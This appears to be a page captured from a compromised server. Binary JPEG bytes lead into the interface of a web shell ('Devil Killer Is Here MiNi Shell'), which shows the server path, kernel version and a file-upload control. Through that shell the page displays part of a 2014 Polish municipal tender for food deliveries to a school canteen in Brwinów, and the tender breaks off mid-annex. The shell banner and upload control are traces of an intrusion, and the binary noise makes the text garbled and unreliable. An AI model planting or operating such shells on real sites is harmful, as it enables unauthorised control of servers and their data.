JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141210/404628-N-2014.html

<p class="kh_header"><b>Brwinów: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁÓWKI SZKOLNEJ 
W ZESPOLE SZKÓŁ NR 1 W BRWINOWIE PRZY UL. PIŁSUDSKIEGO 11 
W OKRESIE OD 02.01.2015R. DO 31.08.2015R.</b><br>
<b>Numer ogłoszenia: 404628 - 2014; data zamieszczenia: 10.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁÓWKI SZKOLNEJ 
W ZESPOLE SZKÓŁ NR 1 W BRWINOWIE PRZY UL. PIŁSUDSKIEGO 11 
W OKRESIE OD 02.01.2015R. DO 31.08.2015R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa artykułów spożywczych do stołówki szkolnej w Zespole Szkół Nr 1 w Brwinowie w podziale na części:
Cześć 1 - Dostawa  artykułów spożywczych (puszki,  tłuszcze  roślinne  i  zwierzęce) do  stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem  asortymentowo  cenowym. 
CPV: 15300000-1  owoce, warzywa i podobne produkty, 
15400000-2  oleje i tłuszcze zwierzęce lub roślinne
Artykuły spożywcze powinny być dostarczane w oryginalnych, nienaruszonych opakowaniach   zawierających oznaczenia fabryczne, tzn. rodzaj, nazwę wyrobu, ilość, datę przydatności  do  spożycia, nazwę i adres producenta oraz inne oznakowania zgodne z  obowiązującymi w tym zakresie przepisami prawa żywnościowego. Dostarczane  artykuły spożywcze w zależności  od  ich  kategorii muszą  przy  każdej dostawie  posiadać  wszystkie  niezbędne  dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych. Transport powinien odbywać się zgodnie wymogami HACCP i  sanitarno- epidemiologicznymi.
Część 2 - Dostawa artykułów  spożywczych (sypkie,  strączkowe, zbożowe) do  stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem asortymentowo  cenowym. 
CPV: 15600000-4  produkty przemiału ziarna, skrobi i produktów skrobiowych, 
03212200-2  warzywa strączkowe suszone, łuskane
Artykuły spożywcze powinny być dostarczane w oryginalnych, nienaruszonych opakowaniach   zawierających oznaczenia fabryczne, tzn. rodzaj, nazwę wyrobu, ilość, datę przydatności  do  spożycia, nazwę i adres  producenta oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego. Dostarczane  artykuły spożywcze w zależności  od  ich  kategorii muszą  przy  każdej dostawie  posiadać  wszystkie  niezbędne  dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych. Transport powinien  odbywać się zgodnie wymogami HACCP i  sanitarno -epidemiologicznymi. 
Cześć 3 - Dostawa drobiu do stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem asortymentowo cenowym.
CPV: 15112000-6  drób
Mięso i produkty drobiowe powinny być dostarczane w zamkniętych opakowaniach lub pojemnikach  plastikowych z  pokrywami, posiadającymi stosowne atesty, plombowane lub metkowane,  czyste  i  nieuszkodzone. Transport powinien odbywać się zgodnie z wymogami HACCP i przepisami  sanitarno- epidemiologicznymi.
Część 4 - Dostawa jaj do stołówki  szkolnej  Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie  z  formularzem  asortymentowo  cenowym.
CPV: 03142500-3 jaja
Jaja, przy każdej  dostawie, muszą  posiadać dokumenty identyfikacyjne dla  jaj konsumpcyjnych.  Jaja  muszą  być przewożone zgodnie z  wymogami HACCP i  sanitarno - epidemiologicznymi.
Część 5 - Dostawa produktów zwierzęcych, mięsa i podobnych produktów do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem  asortymentowo cenowym. 
CPV: 15100000-9 produkty zwierzęce, mięso i produkty mięsne
Produkty zwierzęce, mięso i produkty mięsne powinny być dostarczane w zamkniętych  opakowaniach lub pojemnikach plastikowych z pokrywami, posiadającymi stosowne atesty, czystych i  nieuszkodzonych. Mięso  musi  być  świeżę,  najwyższej  jakości, przewożone  zgodnie  z  wymogami  HACCP i warunkach  spełniających  wymogi  sanitarno - epidemiologiczne.
Część 6 - Dostawa mrożonek do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem asortymentowo cenowym.
CPV: 15332100-5  przetworzone owoce;   15331170-9  warzywa mrożone
Przetworzone owoce, warzywa mrożone powinny być dostarczane w zamkniętych opakowaniach lub pojemnikach, posiadającymi  stosowne  atesty,  bez  oznak  rozmrożenia. Opakowania  nie  powinny  wykazywać oznak uszkodzeń mechanicznych. Transport powinien odbywać się zgodnie  z  wymogami  HACCP i  przepisami  sanitarno- epidemiologicznymi.
Część 7 - Dostawa  nabiału  do stołówki  szkolnej  Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11   zgodnie  z  formularzem  asortymentowo cenowym.    
CPV: 15511000-3  produkty mleczarskie; 15542100-0 ser twarogowy, 
15512300-3  śmietana pełnotłusta;  15551320-4 jogurt z dodatkiem substancji smakowych
Nabiał i wszystkie jego produkty powinny być dostarczane w oryginalnych, nienaruszonych    opakowaniach zawierających oznaczenia fabryczne, tzn. rodzaj nazwę wyrobu, ilość, datę  przydatności  do  spożycia,  nazwę  i  adres  producenta. Przewożone zgodnie  z  wymogami  HACCP i  przepisami sanitarno- epidemiologicznymi. Dostarczane artykuły spożywcze musza przy każdej  dostawie posiadać wszystkie niezbędne dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych.
Część 8 - Dostawa owoców do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11   zgodnie  z formularzem  asortymentowo  cenowym.
CPV: 03200000-3  zboża, ziemniaki, warzywa, owoce i orzechy
Owoce  powinny być świeże, bez  oznak zepsucia  i  pleśni. Powinny być  dostarczane w pojemnikach plastikowych bądź kartonowych posiadających stosowne  atesty. Opakowanie nie powinno wykazywać oznak  uszkodzeń  mechanicznych. Pojemniki  nie  mogą  posiadać oznak  zabrudzenia. Towar  musi być  ułożony w sposób zabezpieczający go przed uszkodzeniem lub  obniżeniem jakości pod względem wartości odżywczych. 
Część 9- Dostawa pieczywa do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie  z  formularzem asortymentowo  cenowym. 
CPV: 15810000-9  pieczywo, świeże wyroby piekarskie i ciastkarskie
Pieczywo, świeże wyroby piekarskie powinny być dostarczane w koszach plastikowych  posiadających  stosowne  atest. Opakowanie  nie  powinno  wykazywać  oznak  uszkodzeń  mechanicznych i  oznak  zabrudzenia. Towar musi być ułożony w koszach w  sposób  zabezpieczający  go  przed  uszkodzeniem  lub obniżeniem jakości zarówno pod względem wartości odżywczych jak też wartości  organoleptycznych. Towar nie może wykazywać  oznak  nieświeżości  lub  zepsucia. Transport  powinien odbywać się  zgodnie  z  wymogami  HACCP i sanitarno - epidemiologicznymi.
Część  10 - Dostawa artykułów  spożywczych (przyprawy i słodycze) do stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11  zgodnie  z  formularzem  asortymentowo  cenowym. 
CPV: 15871270-7  mieszanki przypraw;  15872300-4  zioła;  
15840000-8  kakao, czekolada i wyroby cukiernicze
Artykuły spożywcze powinny być dostarczane w oryginalnych, nienaruszonych opakowaniach   zawierających oznaczenia fabryczne, tzn. rodzaj, nazwę wyrobu, ilość, datę przydatności  do  spożycia, nazwę i adres producenta oraz inne oznakowania zgodne z obowiązującymi w tym  zakresie przepisami prawa żywnościowego. Dostarczane  artykuły spożywcze w zależności  od  ich  kategorii muszą  przy  każdej dostawie  posiadać  wszystkie  niezbędne  dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych. Transport powinien  odbywać się zgodnie wymogami HACCP i  sanitarno -epidemiologicznymi.
Część 11 - Dostawa ryby mrożonej do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11  zgodnie z formularzem asortymentowo cenowym. 
CPV: 15220000-6  ryby mrożone, filety rybne pozostałe mięso ryb
Ryby mrożone powinny być dostarczane w zamkniętych opakowaniach lub pojemnikach, posiadającymi  stosowne  atesty,  bez  oznak  rozmrożenia. Opakowania  nie  powinny  wykazywać oznak  uszkodzeń  mechanicznych. Transport powinien odbywać  się  zgodnie  z  wymogami  HACCP i  przepisami  sanitarno- epidemiologicznymi.
Część 12 - Dostawa warzyw do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z  formularzem  asortymentowo- cenowym.
CPV: 03221000-6  warzywa
Warzywa powinny być świeże, bez  oznak  zepsucia i pleśni. Powinny być  dostarczane w pojemnikach plastikowych bądź kartonowych posiadających stosowne atesty. Opakowanie nie powinno wykazywać oznak  uszkodzeń  mechanicznych. Pojemniki  nie  mogą  posiadać oznak zabrudzenia. Towar musi być ułożony w sposób zabezpieczający go  przed uszkodzeniem lub  obniżeniem jakości pod względem wartości odżywczych.
2. Szczegółowy opis przedmiotu zamówienia zawiera się w załącznikach asortymentowo-cenowych do niniejszej specyfikacji:
- dla Części 1 - załącznik nr 1/1
- dla Części 2 - załącznik nr 1/2
- dla Części 3 - załącznik nr 1/3
- dla Części 4 - załącznik nr 1/4
- dla Części 5 - załącznik nr 1/5
- dla Części 6 - załącznik nr 1/6
- dla Części 7 - załącznik nr 1/7
- dla Części 8 - załącznik nr 1/8
- dla Części 9 - załącznik nr 1/9
- dla Części 10 - załącznik nr 1/10
- dla Części 11 - załącznik nr 1/11
- dla Części 12 - załącznik nr 1/12
3. Wykonawca zapewni, że dostarczone artykuły spożywcze będą należytej jakości oraz, że będą dostarczone w oryginalnych, jednostkowych i nienaruszonych opakowaniach nie później niż w połowie okresu przydatności do spożycia przewidzianego dla danego produktu. 
4. Ilość każdorazowo dostarczanych artykułów żywnościowych i częstotliwość dostaw będzie wskazywana przez Zamawiającego faksem, drogą elektroniczną lub w formie pisemnej z maksymalnym 3-dniowym wyprzedzeniem przed wymaganą dostawą. Sprzedawca zobowiązuje się dostarczać każdorazowo zamawianą faktyczną ilość artykułów w terminie wskazanym w zamówieniu. Dostarczone artykuły nie zamawiane (tj. opakowania zbiorcze czy hurtowe, niezgodne z przedmiotem zamówienia) nie będą przez Zamawiającego przyjmowane. W sytuacji, gdy Wykonawca nie będzie dysponował określonym towarem, zobowiązany jest do powiadomienia o tym Zamawiającego co najmniej jeden dzień przed terminem dostawy i uzgodnić z Zamawiającym produkt zamienny, spośród produktów wymienionych w formularzu asortymentowo-cenowym.
5. Dostawy artykułów spożywczych odbywać się będą w dniach od poniedziałku do piątku z częstotliwością i w godzinach uzgodnionych z Zamawiającym.
6. Wykonawca zobowiązuje się każdorazowo dostarczać zamówioną część przedmiotu umowy do siedziby Zamawiającego własnym transportem, na własny koszt i własne ryzyko, a przewóz artykułów będzie się odbywał zgodnie z wymogami HACCP i przepisami sanitarno-epidemiologicznymi.
7. Zamawiający zastrzega sobie prawo, że zamawiane ilości artykułów żywnościowych mogą ulec zmniejszeniu o 20% w stosunku do przewidzianych ilości w formularzach asortymentowo-cenowych. 
8. Zamawiający przewiduje prawo opcji. W razie konieczności Zamawiający przyznaje sobie prawo do zwiększenia  zamówienia na artykuły żywnościowe do 20% ilości podanych w formularzach asortymentowo-cenowych. 
9. Dostarczane produkty winny spełniać wymagania określone w obowiązujących przepisach prawa dotyczących produkcji i obrotu żywności, a w szczególności: Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (teks jednolity: Dz. U. z 2010 r. Nr 136 poz. 914 z późn. zm.), wraz z przepisami wykonawczymi oraz Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (tekst jednolity Dz. U. z 2014r. poz.669 ze zm.). 
10. W przypadku stwierdzenia przez Zamawiającego wadliwej partii dostarczonego towaru (dostarczone artykuły są niekompletne, niezgodne ze specyfikacją, posiadają wady albo ślady zewnętrznego uszkodzenia, lub w innych uzasadnionych przypadkach) reklamacja zostanie zgłoszona telefonicznie i Zamawiający wskaże w protokole odbioru przyczyny odmowy odbioru oraz wyznaczy nowy termin dostarczenia artykułów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 03.21.22.00-2, 15.11.20.00-6, 03.14.25.00-3, 15.10.00.00-9, 15.33.21.00-5, 15.33.11.70-9, 15.51.10.00-3, 15.54.21.00-0, 15.51.23.00-3, 15.55.13.20-4, 03.20.00.00-3, 15.81.00.00-9, 15.87.12.70-7, 15.87.23.00-4, 15.22.00.00-6, 03.22.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW, 05-840 BRWINÓW, ul. KOŚCIUSZKI 4A, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2014 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW, 05-840 BRWINÓW, ul. GRODZISKA 12, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa  artykułów spożywczych (puszki,  tłuszcze  roślinne  i  zwierzęce) do  stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem  asortymentowo  cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze powinny być dostarczane w oryginalnych, nienaruszonych opakowaniach   zawierających oznaczenia fabryczne, tzn. rodzaj, nazwę wyrobu, ilość, datę przydatności  do  spożycia, nazwę i adres producenta oraz inne oznakowania zgodne z  obowiązującymi w tym zakresie przepisami prawa żywnościowego. Dostarczane  artykuły spożywcze w zależności  od  ich  kategorii muszą  przy  każdej dostawie  posiadać  wszystkie  niezbędne  dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych. Transport powinien odbywać się zgodnie wymogami HACCP i  sanitarno- epidemiologicznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów  spożywczych (sypkie,  strączkowe, zbożowe) do  stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem asortymentowo  cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze powinny być dostarczane w oryginalnych, nienaruszonych opakowaniach   zawierających oznaczenia fabryczne, tzn. rodzaj, nazwę wyrobu, ilość, datę przydatności  do  spożycia, nazwę i adres  producenta oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego. Dostarczane  artykuły spożywcze w zależności  od  ich  kategorii muszą  przy  każdej dostawie  posiadać  wszystkie  niezbędne  dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych. Transport powinien  odbywać się zgodnie wymogami HACCP i  sanitarno -epidemiologicznymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 03.21.22.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa drobiu do stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem asortymentowo cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso i produkty drobiowe powinny być dostarczane w zamkniętych opakowaniach lub pojemnikach  plastikowych z  pokrywami, posiadającymi stosowne atesty, plombowane lub metkowane,  czyste  i  nieuszkodzone. Transport powinien odbywać się zgodnie z wymogami HACCP i przepisami  sanitarno- epidemiologicznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa jaj do stołówki  szkolnej  Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie  z  formularzem  asortymentowo  cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja, przy każdej  dostawie, muszą  posiadać dokumenty identyfikacyjne dla  jaj konsumpcyjnych.  Jaja  muszą  być przewożone zgodnie z  wymogami HACCP i  sanitarno - epidemiologicznymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
